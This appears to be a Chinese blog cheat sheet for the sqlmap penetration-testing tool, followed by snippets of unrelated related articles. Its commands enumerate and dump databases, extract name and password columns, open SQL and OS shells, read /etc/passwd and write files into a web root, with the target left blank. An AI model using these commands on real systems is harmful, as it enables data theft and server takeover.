Sqlmap簡單粗暴

2021-09-27 07:59:42 字數 1943 閱讀 8464

1、檢查注入點

root@kali:/# sqlmap -u
2、爆所有資料庫資訊

root@kali:/# sqlmap -u  --dbs
爆當前資料庫資訊

root@kali:/# sqlmap -u  --current-db
3、列出指定資料庫所有的表名

root@kali:/# sqlmap -u  -d fujieace --tables
'fujieace' 為指定資料庫名稱

4、列出指定表名的所有列名

root@kali:/# sqlmap -u  -d vhost48330 -t admin --columns
'admin' 為指定表名稱

5、dump列印輸出表名指定列名字段的值資料

root@kali:/# sqlmap -u  -d vhost48330 -t admin -c name,password --dump
'name,password' 為指定欄位名稱

1、列出資料庫管理系統使用者:

root@kali:/# sqlmap -u  --users
檢視當前連線資料庫使用者:

root@kali:/# sqlmap -u  --current-user
2、判斷當前使用者是否是dba?

root@kali:/# sqlmap -u  --is-dba
3、檢視使用者許可權:

root@kali:/# sqlmap -u  --privileges
root@kali:/# sqlmap -u  --privileges -u fujieace
1、sql shell

這裡通過sqlmap可以直接獲取乙個sql shell,直接執行sql語句進行互動。

root@kali:/# sqlmap -u  --sql-shell


sql-shell> select version();
注意:這裡由於進入了sql shell可以執行sql語句了,也可以用 load data infile、load_file、into outfile等函式來進行檔案讀取或寫入;

2、cmd shell

這裡通過sqlmap可以直接獲取乙個cmd shell,直接執行cmd命令進行互動。

root@kali:/# sqlmap -u  --os-shell
root@kali:/# sqlmap -u  --os-cmd=ipconfig
3、讀取伺服器上指定檔案

root@kali:/# sqlmap -u  --file-read=/etc/passwd
root@kali:/# sqlmap -u  --file-read=d:/test.txt
4、寫入本地檔案到伺服器上

root@kali:/# sqlmap -u  --file-write /test/test.txt --file-dest /var/www/html/1.txt

git指令簡單粗暴

git status 有兩種顏色,一種是綠色,一種是紅色 紅色為剛更改完 1,最開始流程 git init git add 變成綠色 git commit m 注釋,可以寫上修改內容 檢視在最後一次提交之後的所有變更 git differ head 檢視新增 add 而並未提交 commit 的變更...

sqlmap簡單使用

u 檢測存在可利用漏洞 dbs 獲取所有庫 current db 列出當前資料庫 d 庫名 tables 查詢此庫中存在的表 d 庫名 t 表名 columns 列出表中的所有列 d 庫名 t 表名 c 列名1,列名2 dump 匯出列中的所有資料 sqlmap.py u url sqlmap.py...

簡單粗暴的阿姆達爾定律

技術 於生活,技術又改變了生活。從生活中的例子說起 要完成拖地和燒開水這麼乙個工作,假設燒開水需要花費 2分鐘,拖地需要2分鐘,各佔總時間的50 為了趕時間,我叫上朋友一塊幫忙,因為燒開水的時間不為人所能控制,因此增派人手能做的工作只能是打掃衛生,此時完成整項工作可提公升的速度為 可提公升效率倍數 ...